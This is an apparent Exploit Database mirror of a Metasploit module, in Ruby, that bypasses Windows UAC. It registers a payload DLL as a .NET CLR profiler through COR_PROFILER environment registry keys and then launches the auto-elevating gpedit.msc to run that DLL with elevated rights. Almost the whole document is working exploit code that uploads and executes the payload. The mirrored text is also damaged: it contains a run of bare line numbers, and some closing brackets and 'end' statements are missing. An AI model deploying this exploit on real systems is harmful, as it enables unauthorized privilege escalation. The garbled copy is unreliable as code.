Microsoft Windows – Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)

Exploit Database
119 阅读

作者： Metasploit

日期： 2019-11-20
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/47695/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Local

Rank = ExcellentRanking

include Msf::Exploit::EXE

include Msf::Exploit::FileDropper

include Post::Windows::Priv

include Post::Windows::Runas

def initialize(info={})

super(update_info(info,

'Name'=> 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',

'Description' => %q(

Microsoft Windows allows for the automatic loading of a profiling COM object during

the launch of a CLR process based on certain environment variables ostensibly to

monitor execution.In this case, we abuse the profiler by pointing to a payload DLL

that will be launched as the profiling thread.This thread will run at the permission

level of the calling process, so an auto-elevating process will launch the DLL with

elevated permissions.In this case, we use gpedit.msc as the auto-elevated CLR

process, but others would work, too.

'License' => MSF_LICENSE,

'Author'=> [

'Casey Smith', # UAC bypass discovery and research

'"Stefan Kanthak" <stefan.kanthak () nexgo de>', # UAC bypass discovery and research

'bwatters-r7', # Module

'Platform'=> ['win'],

'SessionTypes'=> ['meterpreter'],

'Targets' => [

[ 'Windows x64', { 'Arch' => ARCH_X64 } ]

'DefaultTarget' => 0,

'Notes' =>

{

'SideEffects' => [ ARTIFACTS_ON_DISK ]

'References'=>

[

['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],

['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']

'DisclosureDate' => 'Mar 17 2017'

)

register_options(

[OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]

)

end

def check

if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?

Exploit::CheckCode::Appears

else

Exploit::CheckCode::Safe

end

def write_reg_value(registry_hash)

vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")

begin

if not registry_key_exist?(registry_hash[:key_name])

registry_createkey(registry_hash[:key_name])

registry_hash[:delete_on_cleanup] = true

else

registry_hash[:delete_on_cleanup] = false

end

registry_setvaldata(registry_hash[:key_name], \

registry_hash[:value_name], \

registry_hash[:value_value], \

registry_hash[:value_type])

rescue Rex::Post::Meterpreter::RequestError => e

print_error(e.to_s)

end

def remove_reg_value(registry_hash)

# we may have already deleted the key

return unless registry_key_exist?(registry_hash[:key_name])

begin

if registry_hash[:delete_on_cleanup]

vprint_status("Deleting #{registry_hash[:key_name]} key")

registry_deletekey(registry_hash[:key_name])

else

vprint_status("Deleting #{registry_hash[:value_name]} from #{registry_hash[:key_name]} key")

registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])

end

rescue Rex::Post::Meterpreter::RequestError => e

print_bad("Unable to clean up registry")

print_error(e.to_s)

end

def exploit

check_permissions!

case get_uac_level

when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,

UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,

UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT

fail_with(Failure::NotVulnerable,

"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")

when UAC_DEFAULT

print_good('UAC is set to Default')

print_good('BypassUAC can bypass this setting, continuing...')

when UAC_NO_PROMPT

print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')

shell_execute_exe

return

end

# get directory locations straight

win_dir = session.sys.config.getenv('windir')

vprint_status("win_dir = " + win_dir)

tmp_dir = session.sys.config.getenv('tmp')

vprint_status("tmp_dir = " + tmp_dir)

exploit_dir = win_dir + "\\System32\\"

vprint_status("exploit_dir = " + exploit_dir)

target_filepath = exploit_dir + "gpedit.msc"

vprint_status("target_filepath = " + target_filepath)

payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'

payload_pathname = tmp_dir + '\\' + payload_name

# make payload

vprint_status("Making Payload")

vprint_status("payload_pathname = " + payload_pathname)

payload = generate_payload_dll

uuid = SecureRandom.uuid

vprint_status("UUID = #{uuid}")

reg_keys = []

# This reg key will not hurt anything in windows 10+, but is not required.

unless sysinfo['OS'] =~ /Windows (2016|10)/

reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",

value_name: '',

value_type: "REG_EXPAND_SZ",

value_value: payload_pathname,

delete_on_cleanup: false)

end

reg_keys.push(key_name: "HKCU\\Environment",

value_name: "COR_PROFILER",

value_type: "REG_SZ",

value_value: "{#{uuid}}",

delete_on_cleanup: false)

reg_keys.push(key_name: "HKCU\\Environment",

value_name: "COR_ENABLE_PROFILING",

value_type: "REG_SZ",

value_value: "1",

delete_on_cleanup: false)

reg_keys.push(key_name: "HKCU\\Environment",

value_name: "COR_PROFILER_PATH",

value_type: "REG_SZ",

value_value: payload_pathname,

delete_on_cleanup: false)

reg_keys.each do |key_hash|

write_reg_value(key_hash)

end

# Upload payload

vprint_status("Uploading Payload to #{payload_pathname}")

write_file(payload_pathname, payload)

vprint_status("Payload Upload Complete")

vprint_status("Launching " + target_filepath)

begin

session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)

rescue Rex::Post::Meterpreter::RequestError => e

print_error(e.to_s)

end

print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")

# wait for a few seconds before cleaning up

print_status("Please wait for session and cleanup....")

sleep(20)

vprint_status("Removing Registry Changes")

reg_keys.each do |key_hash|

remove_reg_value(key_hash)

end

vprint_status("Registry Changes Removed")

end

def check_permissions!

unless check == Exploit::CheckCode::Appears

fail_with(Failure::NotVulnerable, "Target is not vulnerable.")

end

fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

# Check if you are an admin

# is_in_admin_group can be nil, true, or false

print_status('UAC is Enabled, checking level...')

vprint_status('Checking admin status...')

admin_group = is_in_admin_group?

if admin_group.nil?

print_error('Either whoami is not there or failed to execute')

print_error('Continuing under assumption you already checked...')

else

if admin_group

print_good('Part of Administrators group! Continuing...')

else

fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

end

if get_integrity_level == INTEGRITY_LEVEL_SID[:low]

fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')

end